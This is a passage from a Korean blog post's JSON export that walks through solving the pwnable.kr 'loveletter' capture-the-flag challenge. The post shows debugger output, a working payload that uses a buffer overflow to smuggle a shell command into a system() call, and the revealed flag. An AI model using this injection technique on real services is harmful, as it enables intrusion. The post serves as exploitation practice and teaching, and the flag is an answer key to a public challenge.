\u2500\u2500\u2500\u2500\n[#0] 0x80494bd \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  x\/wx $ebp-0x28\n0xffffd5c0:\t0x00000000<\/pre>\n\n\n\n
      \ub530\ub77c\uc11c<\/p>\n\n\n\n
      memcpy(&loveletter[(unsigned __int16)idx], prolog, n);<\/code><\/p>\n\n\n\n
      \ucf54\ub4dc\ub97c \ubb34\ub825\ud654\uc2dc\ud0ac \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
      Result<\/h1>\n\n\n\n
      \ucd5c\uc885\uc801\uc73c\ub85c (\"cat flag \" + \"A\"*244 + \";\"*1)<\/code> \ud14d\uc2a4\ud2b8\ub97c \ub9cc\ub4e4\uc5b4\uc11c \ubcf4\ub0b4\uba74 \uce58\ud658\ub418\uc5b4 bof \ucde8\uc57d\uc810\uc744 \uc77c\uc73c\ucf1c n\uc758 len \uac12\uc774 0\uc774\ub418\uace0, s \ubb38\uc790\uc5f4\uc5d0 \uc758\ud574 flag\ub97c \ud68d\ub4dd\ud560 \uc218 \uc788\ub2e4.<\/p>\n\n\n\n
      Breakpoint 1, 0x080495c9 in main ()\n\n[ Legend: Modified register | Code | Heap | Stack | String ]\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n$eax   : 0x0804c0a0  \u2192  \"cat flag AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n$ebx   : 0x0804c000  \u2192  0x0804bf10  \u2192  <_DYNAMIC+0000> add DWORD PTR [eax], eax\n$ecx   : 0x3e8     \n$edx   : 0x0       \n$esp   : 0xffffd4a0  \u2192  0x0804c0a0  \u2192  \"cat flag AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n$ebp   : 0xffffd5e8  \u2192  0xf7ffd020  \u2192  0xf7ffda40  \u2192  0x00000000\n$esi   : 0x3e8     \n$edi   : 0xf7ffcb80  \u2192  0x00000000\n$eip   : 0x080495c9  \u2192  <main+0224> call 0x80490c0 <system@plt>\n$eflags: [zero carry parity ADJUST SIGN trap INTERRUPT direction overflow resume virtualx86 identification]\n$cs: 0x23 $ss: 0x2b $ds: 0x2b $es: 0x2b $fs: 0x00 $gs: 0x63 \n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n0xffffd4a0\u2502+0x0000: 0x0804c0a0  \u2192  \"cat flag AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\t \u2190 $esp\n0xffffd4a4\u2502+0x0004: 0x000003e8\n0xffffd4a8\u2502+0x0008: 0xf7e64cf0  \u2192  <getegid+0010> ret \n0xffffd4ac\u2502+0x000c: 0x080495b2  \u2192  <main+020d> sub esp, 0x8\n0xffffd4b0\u2502+0x0010: 0xf7fc6460  \u2192  0x00000000\n0xffffd4b4\u2502+0x0014: 0xf7ffd000  \u2192  0x00036f2c\n0xffffd4b8\u2502+0x0018: 0xf7fc6700  \u2192  0x74725f00\n0xffffd4bc\u2502+0x001c: 0xffffd6b4  \u2192  0xffffd7f8  \u2192  \"\/home\/ubuntu\/pwnable.kr\/loveletter\/loveletter\"\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:x86:32 \u2500\u2500\u2500\u2500\n    0x80495bf <main+021a>      sub    esp, 0xc\n    0x80495c2 <main+021d>      lea    eax, [ebx+0xa0]\n    0x80495c8 <main+0223>      push   eax\n \u2192  0x80495c9 <main+0224>      call   0x80490c0 <system@plt>\n   \u21b3   0x80490c0 <system@plt+0000> jmp    DWORD PTR ds:0x804c02c\n       0x80490c6 <system@plt+0006> push   0x40\n       0x80490cb <system@plt+000b> jmp    0x8049030\n       0x80490d0 <strlen@plt+0000> jmp    DWORD PTR ds:0x804c030\n       0x80490d6 <strlen@plt+0006> push   0x48\n       0x80490db <strlen@plt+000b> jmp    0x8049030\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 arguments (guessed) \u2500\u2500\u2500\u2500\nsystem@plt (\n   [sp + 0x0] = 0x0804c0a0 \u2192 \"cat flag AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]\"\n)\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n[#0] Id 1, Name: \"loveletter\", stopped 0x80495c9 in main (), reason: BREAKPOINT\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n[#0] 0x80495c9 \u2192 main()\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ngef\u27a4  x\/wx $esp\n0xffffd4a0:\t0x0804c0a0\ngef\u27a4  x\/s 0x0804c0a0\n0x804c0a0 <loveletter>:\t\"cat flag \", 'A' <repeats 244 times>, \"\u2665 very much!\"\ngef\u27a4  <\/pre>\n\n\n\n
      loveletter@ubuntu:~$ nc 0 9034\ncat flag AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;\nI_Am_Y0ur_eternal_Lov3r\ncat: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\u2665: No such file or directory\ncat: very: No such file or directory\ncat: 'much!': No such file or directory\n\u2665 My lover's name is : \u2665 Whatever happens, I'll protect her...\n\u2665 Impress her upon my memory...\n\u2665 Her name echos in my mind...\n^C\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
      Description Decompiled src a1\uc5d0 “#&;‘\\”|*?~<>^()[]{}$\\\\,”` \ud2b9\uc218 \ubb38\uc790 \uc911 \ud558\ub098\uac00 \uc788\uc73c\uba74, \uadf8 \ub4a4\uc5d0 \uc774\uc5b4\uc9c0\ub294 \ubb38\uc790\uc5f4\uc744 \ub530\ub85c \ube7c\uace0, \uc6d0\ub798 \ubb38\uc790\uc5f4\uc744 \u2665\ub85c \uc798\ub77c\ub0b4\uace0 \ub2e4\uc2dc \ubd99\uc778\ub2e4. \uc0ac\uc6a9\uc790\uc5d0\uac8c \u201clover\u2019s name\u201d\uc744 \ubb3c\uc5b4\ubcf4\uace0 fgets\ub85c \uc77d\ub294\ub2e4. fgets\uac00 \ub0a8\uae30\ub294 ‘\\\\n’\uc744 0\uc73c\ub85c \ub36e\uc5b4\uc368\uc11c \ubb38\uc790\uc5f4 \ub05d\uc744 \uc815\ub9ac\ud55c\ub2e4. protect(s)\ub97c \ud638\ucd9c\ud574 \uc774\ub984\uc5d0 \ud3ec\ud568\ub41c \uc258 \ud2b9\uc218\ubb38\uc790\ub97c \ubaa8\ub450 \ud558\ud2b8(\u2665)\ub85c \uce58\ud658\ud55c\ub2e4. prolog + (\ud558\ud2b8\ub85c \ud544\ud130\ub9c1\ub41c)\uc774\ub984 + epilog \uc21c\uc73c\ub85c loveletter \ubcc0\uc218\uc5d0 \ubcf5\uc0ac\ud558\uace0… \ub354 \ubcf4\uae30 »loveletter<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3280","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3280","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3280"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3280\/revisions"}],"predecessor-version":[{"id":3281,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3280\/revisions\/3281"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3280"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3280"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3280"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}